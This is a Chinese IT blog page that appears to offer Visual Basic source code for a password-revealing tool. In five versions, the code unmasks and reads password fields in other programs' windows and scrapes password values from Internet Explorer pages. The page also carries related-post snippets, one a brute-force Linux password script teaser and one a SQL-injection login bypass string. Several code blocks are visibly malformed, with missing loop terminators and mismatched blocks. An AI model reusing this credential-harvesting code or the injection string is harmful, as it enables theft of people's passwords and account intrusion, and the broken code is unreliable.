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时间:2019-10-12 19:43:28来源:IT技术作者:seo实验室小编阅读:88次「手机版」










'版本1 跟踪焦点获取密码

Public Function m_ReadPwd() As String

   Dim hWndSrc     As Long

   Dim hEdit       As Long

   Dim ThreadId    As Long

   Dim nLength     As Long

   Dim ProcessId   As Long

   Dim CurTID      As Long


   hWndSrc = GetForegroundWindow()

   If hWndSrc = 0 Then Exit Function


   CurTID = GetCurrentThreadId()

   ThreadId = GetWindowThreadProcessId(hWndSrc, ByVal 0)

   If CurTID = ThreadId Then m_ReadPwd = Chr(0): Exit Function


   attachThreadInput CurTID, ThreadId, True

   hEdit = GetFocus()

   If hEdit <> 0 Then

   Dim nChar       As Long

   Dim szText      As String

              If GetWindowLong(hEdit, GWL_STYLE) And ES_PASSWORD Then '是密码框

           nChar = Sendmessage(hEdit, EM_GETPASSWORDCHAR, 0, ByVal 0&)

           If nChar <> 0 Then

                   postmessage hEdit, EM_SETPASSWORDCHAR, 0, 0

                   Sleep 10

                   nLength = SendMessage(hEdit, WM_GETTEXTLENGTH, 0, ByVal 0&)

                   If nLength > 0 Then

                           szText = String(nLength + 1, Chr(0))

                           Call SendMessage(hEdit, WM_GETTEXT, nLength + 1, ByVal szText)

                           szText = Left(szText, InStr(szText, Chr(0)) - 1)

                   End If

                   PostMessage hEdit, EM_SETPASSWORDCHAR, nChar, 0

           End If

   End If

   End If

   AttachThreadInput CurTID, ThreadId, False

   m_ReadPwd = szText

End Function

'版本2 自动获取


Public Function m_SearchPwd(optional ByVal bForceSearch As Boolean = True) As String

   Dim hWndSrc     As Long

   Dim ThreadId    As Long

   Dim nLength     As Long

   Dim CurTID      As Long

   Dim pt          As POINTAPI


   GetCursorPos pt

   hWndSrc = WindowFromPoint(pt.x, pt.y) '获取鼠标所在窗口



   If bForceSearch Then m_CheckWnd hWndSrc, pt.x, pt.y

   If hWndSrc = 0 Then Exit Function


   CurTID = GetCurrentThreadId()

   ThreadId = GetWindowThreadProcessId(hWndSrc, ByVal 0)

   If CurTID = ThreadId Then m_SearchPwd = Chr(0): Exit Function '如果是自己退出


   nLength = SendMessage(hWndSrc, WM_GETTEXTLENGTH, 0, ByVal 0&) '长度

   If nLength <= 0 Then Exit Function


   Dim nChar       As Long

   Dim szText      As String

   szText = String(nLength + 1, Chr(0))

   If GetWindowLong(hWndSrc, GWL_STYLE) And ES_PASSWORD Then

   nChar = SendMessage(hWndSrc, EM_GETPASSWORDCHAR, 0, ByVal 0&) '是否密码框

   If nChar <> 0 Then

           PostMessage hWndSrc, EM_SETPASSWORDCHAR, 0, 0

           Sleep 10

   End If

       End If


   Call SendMessage(hWndSrc, WM_GETTEXT, nLength + 1, ByVal szText)

   If nChar <> 0 Then PostMessage hWndSrc, EM_SETPASSWORDCHAR, nChar, 0

   szText = Left(szText, InStr(szText, Chr(0)) - 1)

   m_SearchPwd = szText

End Function


Sub m_CheckWnd(ByRef hWinCheck As Long, x As Long, y As Long, Optional bSearchhidden As Boolean, Optional bSearchThrough As Boolean)

   Dim hWin                As Long

   Dim hWinParent          As Long

   Dim hWinChild           As Long

   Dim lpRectChild         As RECT

   Dim lpRectWin           As RECT


   '是否搜索透明窗口,以获取最上层窗口 //这个可以省略,一般用不上,要达到完美的话添上

   If bSearchThrough Then

   CheckTransparentWin hWinCheck, x, y

   End If



   hWin = hWinCheck

   CheckSubWin hWin, x, y



   If IsHaveCaption(hWin) = False Then

   hWinParent = GetAncestor(hWin, GA_PARENT)

   'Debug.print "hWinParent=", hWinParent

   If hWinParent = GetDesktopWindow() Then

           hWinParent = hWin

   End If

   GetWindowRect hWin, lpRectWin

   hWinChild = GetWindow(hWinParent, GW_CHILD)

   Do while hWinChild <> 0

           If hWinChild <> hWin Then

                   '是否搜索隐藏窗口 //注意,此处不能用IsWindowVisible,父窗隐藏后将无法知道子窗的显示状态

                   If Not bSearchHidden Imp (GetWindowLong(hWinChild, GWL_STYLE) And WS_VISIBLE) <> 0 Then

                           GetWindowRect hWinChild, lpRectChild

                                  If PtInRect(lpRectChild, x, y) Then

                                   If PtInRect(lpRectWin, lpRectChild.Left, lpRectChild.Top) <> 0 And _

                                           PtInRect(lpRectWin, lpRectChild.Right, lpRectChild.Bottom) <> 0 Then

                                           hWin = hWinChild

                                           'Debug.Print "目标窗口=", hWin

                                           Exit Do

                                   End If

                           End If

                   End If

           End If

                   hWinChild = GetWindow(hWinChild, GW_HWNDNEXT)


   End If


   If hWin <> hWinCheck Then

   hWinCheck = hWin

   m_CheckWnd hWinCheck, x, y '递归

   End If

End Sub


Private Sub CheckSubWin(hWin As Long, x As Long, y As Long, Optional bSearchHidden As Boolean)

   Dim hChild      As Long

   Dim lpRect      As RECT

   hChild = GetWindow(hWin, GW_CHILD)

   Do While hChild <> 0

   If Not bSearchHidden Imp (GetWindowLong(hChild, GWL_STYLE) And WS_VISIBLE) <> 0 Then

           GetWindowRect hChild, lpRect

           If PtInRect(lpRect, x, y) Then

                   hWin = hChild

                   Exit Do

           End If

   End If

   hChild = GetWindow(hChild, GW_HWNDNEXT)


End Sub


Private Sub CheckTransparentWin(hWin As Long, x As Long, y As Long)

   Dim hTop        As Long

   Dim lpRect      As RECT

   hTop = GetAncestor(hWin, GA_ROOT)

   hTop = GetWindow(hTop, GW_HWNDPREV)

   Do While hTop <> 0

   If IsWindowVisible(hTop) <> 0 Then

           GetWindowRect hTop, lpRect

          If PtInRect(lpRect, x, y) Then

                   hWin = hTop

                   CheckTransparentWin hWin, x, y

           End If

   End If

   hTop = GetWindow(hTop, GW_HWNDPREV)


End Sub


Private Function IsHaveCaption(ByVal hWin As Long) As Boolean

   IsHaveCaption = ((GetWindowLong(hWin, GWL_STYLE) And WS_CAPTION) = WS_CAPTION)

End Function

'版本3  //一次性获取


Public Function m_EnumPwd(Optional ByVal bShowPwd As Boolean) As String

   Dim hWndSrc     As Long

   Dim nLength     As Long

   Dim szText      As String

   Dim szTilte     As String

   Dim szPwd       As String


   hWndSrc = FindWindow(vbNullString, vbNullString)

   Do While hWndSrc <> 0

   szPwd = ""

   m_GetText hWndSrc, szPwd, bShowPwd

   If Not bShowPwd Then

           If szPwd <> "" Then

                   nLength = GetWindowTextLength(hWndSrc)

                   If nLength > 0 Then

                           If nLength > 255 Then nLength = 255 '取窗口标题,只取前255个

                           szTilte = String(nLength + 1, Chr(0))

                           Call GetWindowText(hWndSrc, szTilte, nLength + 1)

                           szTilte = Left(szTilte, InStr(szTilte, Chr(0)) - 1)

                   End If

                   szText = szText & "窗口 " & szTilte & " 的密码:" & vbCrLf & szPwd & vbCrLf

           End If

   End If

   hWndSrc = GetWindow(hWndSrc, GW_HWNDNEXT)


   m_EnumPwd = szText

End Function

Sub m_GetText(ByVal hWndSrc As Long, szPwd As String, Optional bShowPwd As Boolean)

   Dim nLength     As Long

   Dim nChar       As Long

   Dim szText      As String


   hWndSrc = GetWindow(hWndSrc, GW_CHILD)

   Do While hWndSrc <> 0

   If GetWindowLong(hWndSrc, GWL_STYLE) And ES_PASSWORD Then

           If SendMessageTimeout(hWndSrc, WM_NULL, 0, 0, SMTO_ABORTIFHUNG Or SMTO_BLOCK, 500, ByVal 0&) <> 0 Then

                   nChar = SendMessage(hWndSrc, EM_GETPASSWORDCHAR, 0, ByVal 0&)

                   If nChar <> 0 Then '是密码框

                           If Not bShowPwd Then

                                   nLength = SendMessage(hWndSrc, WM_GETTEXTLENGTH, 0, ByVal 0&) '长度

                                   szText = ""

                                   If nLength > 0 Then

                                           szText = String(nLength + 1, Chr(0))

                                           PostMessage hWndSrc, EM_SETPASSWORDCHAR, 0, 0

                                           Sleep 10

                                           Call SendMessage(hWndSrc, WM_GETTEXT, nLength + 1, ByVal szText)

                                           PostMessage hWndSrc, EM_SETPASSWORDCHAR, nChar, 0

                                           szText = Left(szText, InStr(szText, Chr(0)) - 1)

                                   End If

                                   szPwd = szPwd & "密码: " & szText & vbCrLf


                                   PostMessage hWndSrc, EM_SETPASSWORDCHAR, 0, 0

                                   PostMessage hWndSrc, WM_SIZE, 0, 0

                           End If

                   End If

           End If

   End If

   m_GetText hWndSrc, szPwd, bShowPwd '递归

   hWndSrc = GetWindow(hWndSrc, GW_HWNDNEXT)


End Sub

'版本4 //获取网页密码

'获取所有密码 mod_Main

Public Function m_EnumWebPwd() As String

   Dim hWndSrc     As Long

   Dim hWndIESer   As Long

   Dim nLength     As Long

   Dim szText      As String

   Dim szTilte     As String

   Dim ProcessId   As Long


   hWndSrc = FindWindow(vbNullString, vbNullString)

   Do While hWndSrc <> 0

   szPwd = ""

   EnumSubWnd hWndSrc

   If szPwd <> "" Then

           GetWindowThreadProcessId hWndSrc, ProcessId

           nLength = GetWindowTextLength(hWndSrc)

           If nLength > 0 Then

                   If nLength > 255 Then nLength = 255 '取窗口标题,只取前255个

                   szTilte = String(nLength + 1, Chr(0))

                   Call GetWindowText(hWndSrc, szTilte, nLength + 1)

                   szTilte = Left(szTilte, InStr(szTilte, Chr(0)) - 1)

               End If

           szText = szText & "句柄: " & hWndSrc & " 进程: " & ProcessId & " 网页标题: " & szTilte & vbCrLf & "密码: " & szPwd & vbCrLf

   End If

   hWndSrc = GetWindow(hWndSrc, GW_HWNDNEXT)


      m_EnumWebPwd = szText

End Function

Private Function EnumSubWnd(ByVal hWin As Long) As Long

   EnumChildWindows hWin, AddressOf EnumWinCallback, ByVal 0

End Function

Public Function EnumWinCallback(ByVal MyhWnd As Long, lParam As Long) As Long

   If IsIEServerHwnd(MyhWnd) Then

   m_ReadWebPwd MyhWnd, szPwd

   End If

   EnumWinCallback = 1

End Function


Private Function IsIEServerHwnd(ByVal hWin As Long) As Boolean

   IsIEServerHwnd = GetWinClass(hWin) = "Internet Explorer_Server"

End Function



Public Function m_ReadWebPwd(ByVal hWin As Long, szText As String)

   'On ERROR Resume Next

   Dim Doc         As IHTMLDocument


   Set Doc = IEDOMFromhWnd(hWin)


      Call GetPwdByDocument(Doc, szText)

End Function

Sub GetPwdByDocument(ByVal Doc As IHTMLDocument, szText As String)

   On Error Resume Next

   If Doc Is Nothing Then Exit Sub

   Dim SubDoc      As IHTMLDocument

   Dim Ele         As IHTMLElement

   Dim EleFra      As IHTMLIFrameElement3

   Dim szPwd       As String

   For Each Ele In Doc.All

   If Ele.tagName = "IFRAME" Then '如果是框架,继续递归获取下一级页面

           Set EleFra = Ele

           Set SubDoc = EleFra.contentDocument

           GetPwdByDocument SubDoc, szText


           If Ele.getAttribute("type") = "password" Then

                   szPwd = CStr(Ele.getAttribute("value"))

                   If szPwd = "" Then szPwd = Ele.innertext

                   szText = szText & szPwd & vbCrLf

           End If

   End If


End Sub

'版本5 //自动获取网页密码


Public Function m_SearchPwd() As String

   Dim hWndSrc     As Long

   Dim pt          As POINTAPI

   GetCursorPos pt

   hWndSrc = WindowFromPoint(pt.x, pt.y) '获取鼠标所在窗口

   If IsIEServerHwnd(hWndSrc) Then

   screentoclient hWndSrc, pt

   m_SearchPwd = m_GetWebPwd(hWndSrc, pt.x, pt.y)

   End If

End Function


Public Function m_GetWebPwd(ByVal hWin As Long, x As Long, y As Long) As String

   'On Error Resume Next

   Dim Doc         As IHTMLDocument

   Dim szText      As String


   Set Doc = IEDOMFromhWnd(hWin)


   Call GetPwdByPoint(Doc, x, y, szText)

   m_GetWebPwd = szText

End Function

Private Sub GetPwdByPoint(ByVal Doc As IHTMLDocument2, ByVal x As Long, ByVal y As Long, szText As String)

   On Error Resume Next

   If Doc Is Nothing Then Exit Sub

   Dim SubDoc      As IHTMLDocument

   Dim Ele         As IHTMLElement

   Dim EleIFrame   As IHTMLIFrameElement3

   Dim rt          As Object


   Set Ele = Doc.elementFromPoint(x, y)

   If Not (Ele Is Nothing) Then

   Debug.Print Ele.offsetleft, Ele.offsettop

   If Ele.tagName = "IFRAME" Then '如果是框架,继续递归获取下一级页面

           Set EleIFrame = Ele

           Set SubDoc = EleIFrame.contentDocument

           Set rt = Ele.getBoundingClientRect

           x = x - rt.Left

           y = y - rt.Top

           GetPwdByPoint SubDoc, x, y, szText


           'Debug.Print x, y, Ele.offsetLeft, Ele.offsetTop

           If Not IsNull(Ele.getAttribute("value")) Then

                   szText = Ele.getAttribute("value")


                   szText = Ele.innerText

           End If

   End If

   End If

End Sub

'***************** 核心代码结束 ************************





“暴力”破解 Linux密码

1.首先我们需要一个“字典”,换而言之,就是密码库,可以用来破解Linux用户的密码 2.接下来,我用一个脚本来给大家简单的写一下 #!/usr/




1.第四届山东理工大学计算机网络与信息安全竞赛 Web——网站后台用户名:uname=1") Or 1 – -密码随便填2.SDUTSec WEB——万能


1.local-user 用户名(admin)2. password simple/cipher 密码(admin)         (其中cipher是密文,simple是明文) 3.qu  4.save



